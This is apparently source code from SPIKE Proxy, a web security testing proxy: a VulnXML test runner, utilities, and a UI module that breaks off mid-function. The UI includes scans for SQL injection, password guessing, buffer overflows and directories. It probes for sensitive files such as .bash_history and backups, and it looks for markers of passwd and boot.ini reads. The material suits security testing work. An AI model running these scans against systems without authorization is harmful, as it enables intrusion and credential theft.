spkproxy/0040775000076500007650000000000007671334650011430 5ustar davedavespkproxy/daveutil.py0100775000076500007650000003463107670116403013617 0ustar davedave#daveutil.py import os import random import string import cPickle from htmllib import HTMLParser from formatter import DumbWriter, AbstractFormatter from cStringIO import StringIO #need this for body() import spkproxy #returns data read or "" if none def readuntil(mysocket,mybreakpoint): data="" length=-len(mybreakpoint) #print "length=%d"%length while data[length:]!=mybreakpoint: newdata=mysocket.recv(1) data+=newdata #print "data=%s"%(data[length:]) return data def urlnormalize(url): """ /cow/../../../bob/bob2.php -> /bob/bob2.php """ #for win32 users f=url.replace("\\","/") if f[-1]=="/": tailslash=1 else: tailslash=0 dot=f.split("/") while "." in dot: dot=dot.remove(".") while "" in dot: dot.remove("") while ".." in dot: firstdotdot=dot.index("..") #go one directory up if firstdotdot==0: dot.remove(dot[0]) continue #get rid of parent directory dot.remove(dot[firstdotdot-1]) #do this again to get rid of the .. dot.remove(dot[firstdotdot-1]) fin="/".join(dot)+"/"*tailslash if fin=="": fin="/" if fin[0]!="/": fin="/"+fin return fin #stolen from http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/82465 def dmkdir(newdir): """works the way a good mkdir should :) - already exists, silently complete - regular file in the way, raise an exception - parent directory(ies) does not exist, make them as well """ if os.path.isdir(newdir): pass elif os.path.isfile(newdir): raise OSError("a file with the same name as the desired " \ "dir, '%s', already exists." % newdir) else: head, tail = os.path.split(newdir) if head and not os.path.isdir(head): dmkdir(head) #print "_mkdir %s" % repr(newdir) if tail: os.mkdir(newdir) #joins all the spaces in a string def joinallspaces(input): inputold="" inputnew=input[:] while inputold!=inputnew: inputold=inputnew[:] inputnew=inputnew.replace(" "," ") return inputnew def getrandomnumber(): return random.randrange(1,100000,1) def pathjoin(*paths): temp="" for path in paths: #print "Pathjoin "+path if path!="": if path[0]=="/" or path[0]=="\\": #we are windoze compliant! path=path[1:] temp=os.path.join(temp,path) #if the first was an absolute path... if paths[0][0]=="/": temp="/"+temp #add that back return temp def pathsplit(path): temp=path last="tempval" retList=[] while last!="": temp,last=os.path.split(temp) if last!="": retList=[last]+retList return retList #following inits are for prettyprint norm = string.maketrans('', '') #builds list of all characters non_alnum = string.translate(norm, norm, string.letters+string.digits) trans_nontext=string.maketrans(non_alnum,'#'*len(non_alnum)) def prettyprint(data): cleaned=string.translate(data,trans_nontext) return cleaned #openss a requestandresponse object in a file and #obtains the url from the header def getURLfromFile(file): #load our request and response object infile=open(file,"rb") obj=cPickle.load(infile) infile.close() url=obj.clientheader.URL return url #takes a url like /bob/bob2/bob3/asdf.cgi #and returns [bob,bob2,bob3,asdf.cgi] def getDirsFromURL(url): dirList=url.split("/") #check for a file at the last one if dirList[-1].count(".")>0: dirList=dirList[:-1] #now combine them up start="/" realDirList=[] for dir in dirList: start+=dir+"/" start=start.replace("_directory_","") start=start.replace("///","/") start=start.replace("//","/") realDirList.append(start) return realDirList #constructs a request given a header and optionally a body def constructRequest(myheader,mybody=None): #for null value if (mybody==None): mybody=spkproxy.body() #debug if 0: return "GET / HTTP/1.1\r\nHost: www.immunitysec.com\r\nContent-Length: 0\r\n\r\n" request=myheader.verb+" "+myheader.getProxyHeader()+myheader.URL #if we have arguments if myheader.useRawArguments: if len(myheader.allURLargs) > 0: request+="?"+myheader.allURLargs else: if len(myheader.URLargsDict) > 0: request+="?" request+=joinargs(myheader.URLargsDict,orderlist=myheader.orderlist) request+=" "+myheader.version+"\r\n" #ok, the first line is done! #do the rest of the headers that need order #I dunno if any except Host really need ordering, but I do it #to erase any chance of lame bugs later on #plus, python makes it quite easy needOrdered=["Host","User-Agent","Accept","Accept-Language","Accept-Encoding","Accept-Charset","Keep-Alive","Connection","Pragma","Cache-Control"] for avalue in needOrdered: request+=myheader.grabHeader(avalue) #now work on the header pairs we haven't already done for akey in myheader.headerValuesDict.keys(): if akey not in needOrdered: request+=myheader.grabHeader(akey) #ok, headers are all done except for content-length #Content-Length: 0 should always be valid, but it's #not working for some reason on get requests! if mybody.mysize!=0 or myheader.verb!="GET": if not myheader.surpressContentLength(): request+="Content-Length: "+str(len(mybody.data))+"\r\n" #ok, all headers are done, finish with blank line request+="\r\n" #ok, now add body request+="".join(mybody.data) #done! return request #takes in a dict, returls A=B&C=D,etc def joinargs(argdict,orderlist=[]): first=1 result="" donelist=[] for akey in orderlist: donelist.append(akey) if not first: result+="&" first=0 result+=akey+"="+argdict[akey] for akey in argdict.keys(): if akey in donelist: continue if not first: result+="&" first=0 result+=akey+"="+argdict[akey] return result #returns None on error #returns a dictionary of a string split like a normal HTTP argument list def splitargs(argstring,orderlist=[]): resultDict={} templist=argstring.split("&") for pair in templist: if pair!="": templist2=pair.split("=") if len(templist2)<2: #print "Failed to parse the URL arguments because of #invalid number of equal signs in one argument in: #\""+pair+"\" len="+str(len(templist2)) return None else: #add this argument to the Dict orderlist.append(templist2[0]) resultDict[templist2[0]]="=".join(templist2[1:]) return resultDict #turns a string into a one character list def splitstring(astring): alist=[] for ch in astring: alist.append(ch) return alist def printFormEntry(name,value): result= name+":
\n" return result #here is where you would add actions that you want to take when #you have an argument or variable (on the rewrite request page) def printFormEntryAndValue(name,key,value,file=""): result="" result+=name+": : " result+="" result+="
\n" #if we have a file (e.g. we are an actual argument) if file != "": result+="Entry Actions: INJECTIONSCAN" result+="\n" result+="PASSWORD" result+="
\n" return result def printFormCheckbox(name,checked): result="" result+=name+": \n" return result #returns 1 if they are basically the same #filters out Date: and whatnot #this is basically to detect if we get different Cookies #this is lame, but it should work ok def headerdictcmp(dict1,dict2): for akey in dict1.keys(): if akey=="Date": continue if not dict2.has_key(akey): return 0 for bkey in dict1[akey]: if not bkey in dict2[akey]: return 0 return 1 #hashes a requestandresponse so we can do matches quickly #returns a string as the hash def genhash(clientheader,clientbody,serverheader,serverbody): #print "in genhash" CH=clientheader.genhash() CB=clientbody.genhash() SH=serverheader.genhash() SB=serverbody.genhash() return CH+CB+SH+SB #hashes a string to a number, then returns that number as a string def hashstring(astring): i=0 #print "in hashstring" if astring=="": return "" hashnum=0 l=len(astring) while i") if index2==-1: continue form=form[:index2] if debug_daveformparse: print "***Form Url is "+url argsDict={} inputList=form.split(" def collectURLSFromPage(page): resultList=[] #print "Doing form parser" if page.count("0: otherlist=daveFormParse(page) for key in otherlist: resultList.append(key) pass #DEBUG #return resultList #print "Doing RAW Parser" spamList=rawParse(page) for key in spamList: resultList.append(key) pass #the whole "AbstractFormater()" line is a bunch of crap I copied #That needs to be documented somehow, but I have no idea what it does try: parser=HTMLParser(AbstractFormatter(DumbWriter(StringIO()))) parser.feed(page) parser.close() except: #print "DEBUG: Caught an exception trying to parse that html file." #print "(Not sure why this happens - you'll have to crawl this page manually)" return resultList #print "Adding HTML Parser data" for key in parser.anchorlist: resultList.append(key) pass return resultList spkproxy/VulnXML.py0100775000076500007650000006262107556004602013307 0ustar davedave#!/usr/bin/python #VulnXML.py #Dave Aitel #GPL v 2.0 #this is an implementation of VulnXML that should fit into any web framework #although it was originally designed to work with SPIKE Proxy #it shouldn't require anything except Python 2.2 #TODO: #DONE Adding headers is not exclusive - we need to make it so #DONE Need to finish testcriteria and results #DONE need to check if chunked, and if so, send no content length #need to go through site example checking for /cgi-bin/pu3.asp # without knowing anything about the site except for / # hmm. First we need to do a directory check on /cgi-bin/ # This needs to add itself to our GET requests # then we need to do a directory check on pu3.asp # hmm. On success we can save out our template request! We really want # to store the serverheader and serverbody as well #we can just resend with log=1 and we'll have logged it #version 1.0 from xml.dom.minidom import parse,parseString import cPickle #for matching import re #random numbers are used for temp files import random #change this if you arn't using spike proxy import spkproxy import requestandresponse import sys,os import base64 #gets the text from a nodelist def getText(nodelist): rc = "" for node in nodelist: if node.nodeType == node.TEXT_NODE: rc = rc + node.data return rc def getTextWithEncoding(node): result=getText(node.childNodes) encoding=node.getAttributeNS(None,"encoding") if encoding==None or encoding=="text": return result if encoding=="base64": return base64.decodestring(result) else: #print "BUGBUG: encoding type not known %s"%encoding #acually, I am lazy and sometimes just use this for text with no encoding as well return result #only gets child elements - does not get text elements def getChildElementsByTagName(node,tagname): #print "Here we are!" resultList=[] for child in node.childNodes: if child.__class__.__name__=="Element" and child.tagName==tagname: resultList.append(child) return resultList #handles groupings transparantly. #if there is a group identified by parens #then we use that, otherwise, we return the whole string def makerematch(reobj): if reobj==None: return "" if len(reobj.groups())>0: return reobj.group(1) else: return reobj.group() #this class encapsulates all the things you ever return from calling a VulnXMLTest class VulnXMLResults: def __init__(self): self.foundFilesOrDirs=[] self.logMessages=[] self.doOnce=0 #we could implement a Dom Dictionary cache quite easily (in load) #this class is used as an interface to whatever client request template you happen #to have implemented class TemplateRequest: def __init__(self): self.templateFile="" self.URIpath="" self.URIfile="" pass #load ourselves in from a file. You may need to change this if you don't #use SPIKE Proxy def loadFromFile(self,templateFile): infile=open(templateFile,"rb") #just pickle it in, whatever it is obj=cPickle.load(infile) #you must have these two items defined! self.clientheader=obj.clientheader self.clientbody=obj.clientbody self.templateFile=templateFile infile.close() return def reload(self): self.loadFromFile(self.templateFile) return 1 #returns the last part of the URL (as determined by ? and then /'s) def getURIfile(self): if self.URIfile!="": return self.URIfile URL=self.clientheader.URL self.URIpath="/"+"/".join(URL.split("?")[0].split("/")[1:-1]) self.URIpath=self.URIpath.replace("//","/") self.URIfile=URL.split("/")[-1] return self.URIfile #returns a site tuple (host,port,isssl) def getSite(self): result= self.clientheader.getSiteTuple() #print "Result=%s"%str(result) return result #opens up the template File and edits a path def getURIpath(self): if self.URIpath!="": return self.URIpath URL=self.clientheader.URL self.URIpath="/"+"/".join(URL.split("?")[0].split("/")[1:-1]) self.URIpath=self.URIpath.replace("//","/") self.URIfile=URL.split("/")[-1] return self.URIpath #add a header to the request - delete whatever was there def addHeader(self,headername,headervalue): self.clientheader.removeHeaders(headername) self.clientheader.addHeader(headername,headervalue) #here we special case chunked transfer encodings if headername=="Transfer-Encoding" and headervalue=="chunked": self.clientheader.setSurpressContentLength() return #creates a body with our seperator and body values def createBody(self,seperator,bodyvals): bodyList=[] first=1 for item in bodyvals: if not first: for sep in seperator: bodyList.append(sep) for val in item: bodyList.append(val) first=0 self.clientbody.data=bodyList self.clientbody.setSize(len(bodyList)) return ########################################### class VulnXMLTest: def __init__(self,file=""): if file!="": self.load(file) self.messagebody=None self.foundFilesOrDirs=[] self.doOnce=0 self.dositetest=0 self.dofilerun=0 self.dodirrun=0 return #used for sending requests! def setUI(self,UI): self.UI=UI return #gets the value of the test name def getTestName(self): return getTextWithEncoding(getChildElementsByTagName(self.testdescription,"TestName")[0]) def getTestFile(self): return self.testFile def load(self,file): self.testFile=file #print "Loading %s into dom"%file self.dom = parse(file) return 1 #site is a tuple (host,port,ssl_int) #SiteRun's don't have a template file to work from, #so we just create one on the fly. def SiteRun(self,site): newtemplatefilename="temp_siterun"+str(random.randint(0,65535))+".spt" #this is SPIKE Proxy specific code right here myRandR=requestandresponse.RequestAndResponse(spkproxy.header(),spkproxy.body(),spkproxy.header(),spkproxy.body()) myRandR.clientheader.URL="/" myRandR.clientbody.body=[] myRandR.clientheader.setSiteTuple(site) myRandR.serverheader=None myRandR.serverbody=None #now write this as a pickle to our file #this is not SPIKE Proxy specific openfile=open(newtemplatefilename,"wb") binary=1 cPickle.dump(myRandR,openfile,binary) openfile.close() #mark what test we are doing so we match correctly self.dositetest=1 results=self.doTemplateRun(newtemplatefilename) #now delete our temporary file os.unlink(newtemplatefilename) return results #uses directory as the URL, but templateFile as the template def DirRun(self,directory,templateFile): self.dodirrun=1 #set the directory and ignore the path results=self.doTemplateRun(templateFile,directory=directory,file="") return results def doTemplateRun(self,templateFile,directory="", file=""): results=VulnXMLResults() #print "do Template Run Called!" #load in the template #print running test name and test version #for each step # run post/get # set variables # apply testcriteria #if testcriteria==SUCCESS then register as event #set the file we will use to load in the template self.templateRequest=TemplateRequest() self.templateRequest.loadFromFile(templateFile) #if we set eithar of these, they need to be used instead #of the ones in the template if directory=="" and file=="": self.URIfile=self.templateRequest.getURIfile() self.URIpath=self.templateRequest.getURIpath() else: self.URIfile=file self.URIpath=directory self.site=self.templateRequest.getSite() self.initDomForUse() #print "after init Dom For Use" #this string stores our result from our test criteria tcstring=self.runTest() #print "tcstring = %s after running test"%tcstring if tcstring=="SUCCESS": results.foundFilesOrDirs=self.foundFilesOrDirs results.doOnce=self.doOnce if self.dofilerun: results.logMessages.append("VulnXML Test reported SUCCESS on test %s in file %s with template %s"%(self.getTestName(),self.getTestFile(),templateFile)) elif self.dositetest: results.logMessages.append("VulnXML Test reported SUCCESS on test %s in file %s"%(self.getTestName(),self.getTestFile())) elif self.dodirrun: results.logMessages.append("VulnXML Test %s reported SUCCESS on directory %s"%(self.getTestName(),self.URIpath)) else: results.logMessages.append("VulnXML Test reported SUCCESS!") return results #done def FileRun(self,templateFile): self.dofilerun=1 results=self.doTemplateRun(templateFile) return results def VariablesRun(self,templateFile): results=VulnXMLResults() return results #returns a string with all the gibberish replaced with actual strings def replaceConstantStrings(self,instring): result=instring result=result.replace("${file}",self.URIfile) result=result.replace("${path}",self.URIpath) (host,port,isssl)=self.templateRequest.getSite() result=result.replace("${host}",host) result=result.replace("${port}",str(port)) result=result.replace("${5000}","A"*5000) return result #here we glean some variables from the DOM def initDomForUse(self): #ok, now load our Dom properly self.webtestnode=getChildElementsByTagName(self.dom,"WebApplicationTest")[0] self.testdescriptions=getChildElementsByTagName(self.webtestnode,"TestDescription") self.testdescription=self.testdescriptions[0] self.connectionNodes=getChildElementsByTagName(self.webtestnode,"Connection") self.connectionNode=self.connectionNodes[0] self.steps=getChildElementsByTagName(self.connectionNode,"Step") return def loadTemplateFromFile(self,templateFile): #load the template file for request - #if you are not using SPIKE Proxy you may want to change these #few lines here #to be cool, load it into a string, then unpickle it, and save the string #so you don't do disk reads in the future self.templateRequest=TemplateRequest() self.templateRequest.loadFromFile(templateFile) return #sets up the request based on our templateRequest and dom def setupRequest(self,step): #first do this... request=getChildElementsByTagName(step,"Request")[0] self.loadMessageHeader(request) self.loadMessageBody(request) return #tests if we need to match this - parsing the DOM and clientheader to find out #returns 1 on success, 0 on fail #example: # # .*.asp # def testMatch(self): #print "testMatch" triggeron=getChildElementsByTagName(self.testdescription,"TriggerOn") #print "after triggeron" #no trigger, then we always match if triggeron==None: #print "returning 1" return 1 for triggerent in triggeron: #get the type of event triggertype=triggerent.getAttributeNS(None,"event") matches=getChildElementsByTagName(triggerent,"Match") for match in matches: matchregex=getText(match.childNodes) #ANY is magic type used for automatically trigger if ( triggertype=="file" or triggertype=="any" ) and self.dofilerun: result=re.search(matchregex,self.templateRequest.URIfile) if result!=None: return 1 elif ( triggertype=="any" or triggertype=="directory" ) and self.dodirrun: result=re.search(matchregex,self.templateRequest.URIpath) if result!=None: return 1 elif ( triggertype == "any" or triggertype=="scheme_host_port" ) and self.dositetest: return 1 #TODO: fill in site and variable here else: print "BUGBUG: TRIGGER EVENT %s IS NOT RECOGNIZED!"%(triggertype) #print "returning 0" return 0 #actually sends the request out and parses the response! def runTest(self): #test if we should even run this test against this template if not self.testMatch(): return "NOMATCH" for step in self.steps: #might be a bit slow reading from the file each time #but this way we dont have to save off each variable #and restore it, which could be a pain #a better way would be to have a way to save a copy with pickle-to-string #or something #print "Running step." self.templateRequest.reload() self.setupRequest(step) self.response=self.sendRequest() self.parseResponseVariables(step) tcstring=self.parseTestCriteria(step) if tcstring=="FAILURE": print "VulnXML reported failure to find vulnerability" return tcstring if tcstring=="SUCCESS": print "VulnXML SUCCESS!" #resend request and save the response this time self.sendRequest(log=1) return tcstring def loadMessageHeader(self,request): print "loadMessageHeader" mh=getChildElementsByTagName(request,"MessageHeader")[0] #no Message header has to exist in the DOM, so if we don't find one #we return cleanly if mh==None: return methods=getChildElementsByTagName(mh,"Method") if methods!=None: #we only use the first method - if there are more than one, tough method=getText(methods[0].childNodes) #print "USING METHOD %s"%method self.templateRequest.clientheader.verb=method URIelements=getChildElementsByTagName(mh,"URI") if URIelements!=None: #we don't need a URI either - we can just use what we've got #the VulnXML guys are dead set on using a URI though, cause #they don't have a templateRequest. #For file/variable requests we should really #just ignore it, but we'll use it and see how that works URI=getText(URIelements[0].childNodes) URI=self.replaceConstantStrings(URI) #print "Setting URL to %s"%URI self.templateRequest.clientheader.URL=URI VersionElements=getChildElementsByTagName(mh,"Version") if VersionElements!=None: version=getText(VersionElements[0].childNodes) #print "USING VERSION %s"%version self.templateRequest.clientheader.version=version headerElements=getChildElementsByTagName(mh,"Header") for header in headerElements: headername=getText(getChildElementsByTagName(header,"Name")[0].childNodes) headervalue=getText(getChildElementsByTagName(header,"Value")[0].childNodes) #add that header headervalue=self.replaceConstantStrings(headervalue) self.templateRequest.addHeader(headername,headervalue) #we can also force content-length to something, in which case we don't want #to auto-calculate it if headername.lower()=="content-length": self.templateRequest.setForcedContentLength() #done with setting up the request's header return #sets up up the request's body - the old request's body ALWAYS gets overwritten #hopefully that won't cause a problem during anyone's testing... def loadMessageBody(self,request): #we don't necesserally even have a body if len(getChildElementsByTagName(request,"MessageBody"))==0: self.templateRequest.createBody("",[]) return bodyElements=getChildElementsByTagName(request,"MessageBody")[0] separatorElements=getChildElementsByTagName(bodyElements,"Separator") if separatorElements!=None: #we've set a separator, since the default is "&" separator=getTextWithEncoding(separatorElements[0]) else: separator="&" bodyItems=[] items=getChildElementsByTagName(bodyElements,"Item") for item in items: itemtext=getTextWithEncoding(item) #replace any ${something} strings with their real equivalents itemtext=self.replaceConstantStrings(itemtext) bodyItems.append(itemtext) self.templateRequest.createBody(separator,bodyItems) #done setting up the request's body return #sends the request and gets back a response #!!!you'll have to change this if you are not using SPIKE Proxy!!! def sendRequest(self,log=0): #we send our UI in as the UI for our child request myconnection=spkproxy.spkProxyConnection(None,self.UI) myconnection.clientisSSL=self.templateRequest.clientheader.clientisSSL if myconnection.clientisSSL: myconnection.sslHost=self.templateRequest.clientheader.connectHost myconnection.sslPort=self.templateRequest.clientheader.connectPort if not log: self.UI.dontLog(self.templateRequest.clientheader) result=myconnection.sendRequest(self.templateRequest.clientheader,self.templateRequest.clientbody) if not log: self.UI.removeDontLog(self.templateRequest.clientheader) return result #this has to go through the XML for our current step and set each variable appropriately #these get stored in a list def parseResponseVariables(self,step): #print "INSIDE PARSERESPONSE" response=getChildElementsByTagName(step,"Response") if response==None: return "Error: No response found!" if len(response)!=1: return "Error: More than one response block found!" #there can BE only one response=response[0] #reset this self.variables=[] setvariables=getChildElementsByTagName(response,"SetVariable") for setvariable in setvariables: #variables must first have a name variableName=setvariable.getAttributeNS(None,"name") #and then a type variableType=setvariable.getAttributeNS(None,"type") if variableType!="string": print "BUGBUG: CANNOT HANDLE VARIABLE TYPE %s"%variableType return "NOTOK" #then they have a Source, which has a source attribute and a regex string value variableSource=getChildElementsByTagName(setvariable,"Source") if len(variableSource)!=1: print "BUGBUG: variableSource length != 1!" return "NOTOK" variableSource0=variableSource[0] variableSourceSource=variableSource0.getAttributeNS(None,"source") variableSourceText=getText(variableSource0.childNodes) if variableSourceSource=="message-body": variableResult=self.messagebodyRegex(variableSourceText) elif variableSourceSource=="status-line": #print "Status Line Regex: %s"%(variableSourceText) variableResult=self.statuslineRegex(variableSourceText) elif variableSourceSource=="message-header": variableResult=self.messageHeaderRegex(variableSourceText) else: print "BUGBUG: %s is not a valid source!"%variableSourceSource return "NOTOK" #store each as a tuple in a list self.variables.append((variableName,variableResult)) #print "self.variables=%s"%str(self.variables) #all the variables have been set and stored in the self.variables list return "OK" #parses the test criteria and checks for a SUCCESS or FAILURE def parseTestCriteria(self,step): #print "INSIDE PARSETESTCRITERIA" tests=getChildElementsByTagName(step,"TestCriteria") for test in tests: #store off the test type ("SUCCESS" or "FAILURE") testType=test.getAttributeNS(None,"type") #we have a compare, and it can have many other compares under it, which are anded compares=getChildElementsByTagName(test,"Compare") testistrue=0 #these compares get ORed for compare in compares: if self.testCompare(compare): testistrue=1 break #only one test is ever true, hopefully if testistrue: return testType #solve each compareeach compare has attributes variable, test and value return "NOTESTWASTRUE" #recursive function that tests compares #example: # #200 # # # # def testCompare(self,compare): compareVariable=compare.getAttributeNS(None,"variable") #print "Compare Variable %s"%compareVariable #print "Length of Value elements = %d"%len(compare.getChildElementsByTagName("Value")) compareTest=compare.getAttributeNS(None,"test") #print "CompareTest=%s"%compareTest compareValue=getText(getChildElementsByTagName(compare,"Value")[0].childNodes) #strip ${ and } compareVariable=compareVariable[2:-1] #print "CompareValue=%s CompareVariable=%s"%(compareValue,compareVariable) #print "Get Compare Value is equal to: %s"%self.getVariableValue(compareVariable) #print "CompareTest=%s"%compareTest #do our compares if compareTest=="notequals": #print "notequals chosen" if compareValue==self.getVariableValue(compareVariable): return 0 if compareTest=="equals": #print "Equals chosen" if compareValue!=self.getVariableValue(compareVariable): #print "returning zero" return 0 morecompares=getChildElementsByTagName(compare,"Compare") #no more? if morecompares==None: return 1 #we have more - we are recursing to handle them #these are all ANDed together - so if any are false, we are false for newcompare in morecompares: if not self.testCompare(newcompare): return 0 return 1 def initInternalVariables(self): if self.messagebody==None: body=self.response.split("\r\n\r\n") if len(body)<2: print "Why is the len(body) from this response < 2?" return "" self.messagebody="\r\n\r\n".join(body[1:]) self.messageheader=body[0] self.statusline=self.messageheader.split("\r\n")[0] return #match inside the header def messageHeaderRegex(self,regexstring): self.initInternalVariables() if regexstring=="" or self.messageheader=="": return "" result=re.search(regexstring,self.messageheader) if result==None: return "" #transform result into a string from an re object result=makerematch(result) return result #this function returns a string that matches a regex in the body def messagebodyRegex(self,regexstring): self.initInternalVariables() #print "messagebodyregex" #print "self.messagebody=%s"%self.messagebody #print "regexstring=%s"%regexstring if regexstring=="" or self.messagebody=="": return "" #print "regexstring=%s self.messagebody=%s"%(regexstring,self.messagebody) result=re.search(regexstring,self.messagebody) if result==None: #print "returning nothing" return "" result=makerematch(result) #print "Returning %s"%result return result #returns a string that is the match of the thing in the status line def statuslineRegex(self,regexstring): self.initInternalVariables() if regexstring=="" or self.statusline=="": return "" result=re.search(regexstring,self.statusline) if result==None: return "" result=makerematch(result) return result #gets a variable from our variables list def getVariableValue(self,compareVariable): #print "Variables=%s"%(self.variables) for variabletuple in self.variables: if variabletuple[0]==compareVariable: return variabletuple[1] print "BUGBUG: Did not find variable %s in our variables list"%compareVariable return "" spkproxy/bottomright.html0100664000076500007650000000062007555550270014652 0ustar davedave bottom Refresh
***LOGS*** spkproxy/spikeProxyUI.py0100775000076500007650000020421107667723312014417 0ustar davedave#!/usr/bin/python #spikeProxyUI.py, a basic web based interface for the SPIKE Proxy #Version: 1.4.8 #License: GPL v 2.0 # #externally, offers 2 classes: # wantsRequest, which takes in a header and returns a boolean, yes or no # handleRequest, which handles a request as defined by header and body #that's it. :> Hmm. not quite correct actually ###Known Bugs #FIXED 1. Some sites use /bob.extention/argument=value&arg2=val2 . . . we don't #handle this right at the moment. (see getPageH() comment ) #FIXED 2. The economist.com site fails. They appear to break spec Grr. #3. locking not implemented in key sections, like the donotlog array, request cache, etc #4. Invalid "sites" are created when scanning sometimes..why? ############## #Features to do # #crawling #directory finding #delete tree/page/site #persistant bugs found page #some sort of whisker behavior - possibly reading whisker2 files and # parsing those #All of these are done except DELETE ######IMPORTS #global imports import os import dircache import cPickle import urllib import urlparse import time #my imports from requestandresponse import RequestAndResponse #import some misc stuff Dave wrote import daveutil #import the main spkproxy library import spkproxy #import Dave's VulnXML library import VulnXML #END IMPORTS UIVERSION="1.4.8" #global notimplementedyet="Error

Not implemented yet, sorry.

" #extentions that are never valid html pages invalidHTMLExtentions=["ppt","pdf","tgz","gz","zip","jpg","gif","png","cab","tar","sig"] #these two lists need some serious filling in #we check for www.site.com/file.html.bak for example backupSuffixList=["~",".bak",".backup",".zip",".back",".txt",".xsl",".orig",".Orig",".BAK",".Bak",".Backup",".TXT",".ORIG"] #we check for www.site.com/directory/ws_ftp.log, etc fileRotList=["global.asa","ws_ftp.log",".bash_history",".private","template.xsl","include.asp"] succeededList=["Successfully"] passwordFailedList=["Failed"] #Uncomment if needed but "error" may produce false positives #sqlinjectSucceeded=["ODBC","SQL","4096","","500","error","Error",":0:0","[boot","alert('XSS')"] sqlinjectSucceeded=["ODBC","SQL","4096","","500",":0:0","[boot","alert('XSS')","ORA-017"] #here we do some wackyness to read in the words file. def chomp(line): line = line.split('\n')[0] return line.split('\r')[0] f=open("words","r") #read entire file contents=f.readlines() f.close() scanDirList = [chomp(line) for line in contents] #print "Loaded wordlist from \"words\"" f=open("passchecklist","r") #read entire file contents=f.readlines() f.close() PassCheckList = [chomp(line) for line in contents] #print "Loaded password list from \"passchecklist\"" #main class class spkProxyUI: def __init__(self): self.triggerhost="spike" self.basedir=daveutil.pathjoin(os.getcwd(),"spikeProxyUI") self.dostore=1 self.stopallactions=0 self.parent=None #if the path doesn't exit, make it exist daveutil.dmkdir(self.basedir) #set up our keywords function table self.initkeywords() self.setupfuzzstrings() self.requestCache=[] self.requestCacheMaxLength=500 self.logs=[] self.maxlogs=1500 self.setupTriggers() #stores objects we don't want to talk about self.nottolog=[] self.VulnXMLDirectory="VulnXML" self.VulnXMLVariableTestsDirectory="VariableTests" self.VulnXMLDirectoryTestsDirectory="DirectoryTests" self.VulnXMLFileTestsDirectory="FileTests" self.VulnXMLSiteTestDirectory="SiteTests" self.log("SPIKE UI version "+UIVERSION+" Started") self.ntlm=() self.proxy=() self.parent=None return def setNTLM(self,ntlm): self.ntlm=ntlm def setProxy(self,proxy): self.proxy=proxy def setParent(self,parent): """ This function lets the UI talk to the first spkproxy instance """ self.parent=parent #any sort of trigger based on the header is supported, #but we just look at the hostname def wantsRequest(self,myheader): #print "Inside wantsRequest" if myheader.connectHost==self.triggerhost: #print "I want to look at this request with spike in it." return 1 if myheader.URLargsDict.has_key("SPIKE_TRIGGER"): return 1 return 0 #handles the request and returns a string #as the response def handleRequest(self,myheader,mybody): if not self.wantsRequest(myheader): return "Uh, why did we get this request?" extention=myheader.URL.split(".")[-1] #print "extention: "+extention if extention=="html" and not myheader.URLargsDict.has_key("SPIKE_TRIGGER"): #print "html request received with no SPIKE_TRIGGER" filename=myheader.URL.replace("http://spike/","") #print "filename="+filename return self.serveFile(filename) urlfile=myheader.URL.split("/")[-1] #handle all the wacky file stuff file="" data="" haveheader=0 if myheader.URLargsDict.has_key("file"): file = myheader.URLargsDict["file"] #print "Handling: urlfile="+urlfile+" file="+file+" SPIKE_TRIGGER="+str(myheader.URLargsDict.has_key("SPIKE_TRIGGER")) #print "myheader.URL="+myheader.URL if urlfile=="getinfo": data=self.getinfo(file) elif urlfile=="stop": self.stopallactions=1 data="All actions stopped" elif urlfile=="allow": self.stopallactions=0 data="All actions allowed" elif urlfile=="crawl": data=self.crawl(file) elif urlfile=="argscan": data=self.argscan(file) elif urlfile=="xmlTest": data=self.doXMLTest(file) elif urlfile=="dirscan": data=self.dirscan(file) elif urlfile=="overflow": data=self.overflow(file) #argument scanning support elif urlfile=="sqlargscan": if myheader.URLargsDict.has_key("name"): name = myheader.URLargsDict["name"] data=self.sqlargscan(file,name) else: data="" elif urlfile=="passwordargscan": print "passwordargscan: "+file if myheader.URLargsDict.has_key("name"): name = myheader.URLargsDict["name"] data=self.passwordargscan(file,name) else: data="" #configuration support elif urlfile=="config": data=self.printConfig() elif urlfile in ["setconfig","setConfig"]: if myheader.URLargsDict.has_key("name"): name = myheader.URLargsDict["name"] if myheader.URLargsDict.has_key("value"): value=urllib.unquote_plus(myheader.URLargsDict["value"]) else: value="" data=self.setConfig(name,value) else: data="" elif urlfile=="displayresponse": data=self.displayResponse(file) #print a form for calling sendrequest elif urlfile=="rewrite" and myheader.URLargsDict.has_key("SPIKE_TRIGGER"): #print "rewriting" data= self.rewrite(file) elif urlfile.count("sendrequest") and mybody.getArgsDict().has_key("SPIKE_TRIGGER"): #send out a new request and return the results data=self.sendrequest(myheader,mybody) haveheader=1 #otherwise, let's move on and handle this request if myheader.URL=="/": filename="index.html" #print "filename="+filename return self.serveFile(filename) if (data==""): byestring=notimplementedyet return "HTTP/1.1 501 Not implemented!\r\nContent-Length: "+str(len(byestring))+"\r\n\r\n"+byestring else: if not haveheader: data=self.addHeader(data) return data #registers the header and body of the request and response in our store def registerRequestandResponse(self,clientheader,clientbody,serverheader,serverbody): if self.dostore==0: return 1 #basically we organize things as first Sites, then pages, #then requests+responses #we need to check this in case we are crawling or otherwise don't want to store this #page if clientheader in self.nottolog: return 1 #do we have this "site" in our store? #A site is defined by host,port,isSSL site=self.getSiteFromHeader(clientheader) if serverheader==None: serverheader=spkproxy.header() if serverbody==None: serverbody=spkproxy.body() if not self.haveSiteInStore(site): self.createSite(site) #need to check for if we have this page or not #a page is just: /foo/bar.php or similar page=self.getPageH(clientheader) if not self.havePageInStore(page): self.createPage(page) #we don't want to store duplicates if self.duplicateRequestandResponse(clientheader,clientbody,serverheader,serverbody): #print "Duplicate request and response" return 1 #print "before store: "+str(clientheader)+" Type: "+str(type(clientheader)) #otherwise, we need to store this request and response off result=self.storeRequestandResponse(clientheader,clientbody,serverheader,serverbody) return result ########################################################################### #End public methods ########################################################################### def getSiteFromHeader(self,clientheader): return [clientheader.connectHost,str(clientheader.connectPort),str(clientheader.clientisSSL)] #converts a site to a string, just a .join call for now def sitestr(self,site): #print "Site="+str(site) return self.strencode("_".join(site)) def sitestrh(self,clientheader): return self.sitestr(self.getSiteFromHeader(clientheader)) #returns a 1 if we have that site in our store def haveSiteInStore(self,site): sitename=self.sitestr(site) result= os.path.isdir(daveutil.pathjoin(self.basedir,sitename)) #print "Do we have "+sitename+" in our store: "+str(result) return result #creates a "site" store on disk def createSite(self,site): #is this / going to bite us when we go win32? Who cares? :> #fixed with daveutil.pathjoin! 